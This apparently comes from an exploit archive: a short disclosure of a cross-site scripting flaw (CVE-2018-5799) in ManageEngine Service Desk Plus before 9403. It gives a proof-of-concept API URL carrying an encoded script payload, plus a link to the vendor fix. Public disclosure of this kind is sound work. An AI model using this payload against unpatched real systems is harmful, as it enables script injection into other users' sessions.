ManageEngine Service Desk Plus Cross Site Scripting

ManageEngine Service Desk Plus versions prior to 9403 suffer from a cross site scripting vulnerability.


MD5 | 064eb3d5851a1d2c6236211e0bbb1512

# Exploit Title: ManageEngine Service Desk Plus < 9403 Cross-Site Scripting
# Vendor Homepage: https://www.manageengine.com/
# Version: < 9403
# CVE : CVE-2018-5799

# Proof of Concept #1

Visiting the following page:

/api/request/?OPERATION_NAME=GET_REQUESTS">*"%3ca
xmlns%3aa%3d'http%3a%2f%2fwww.w3.org
<http://2fwww.w3.org>%2f1999%2fxhtml'%3e%3ca%3abody
onload%3d'alert(1)'%2f%3e%3c%2fa%3e*
&TECHNICIAN_KEY=E428CCCD-D5F4-4CF8-9452-76C195982BE3&INPUT_DATA=from0limit25filterbyAll_Requests

will cause the execution of script.

# Fixes

https://www.manageengine.com/products/service-desk/readme.html

issue fixed on version 9403



Related Posts

Comments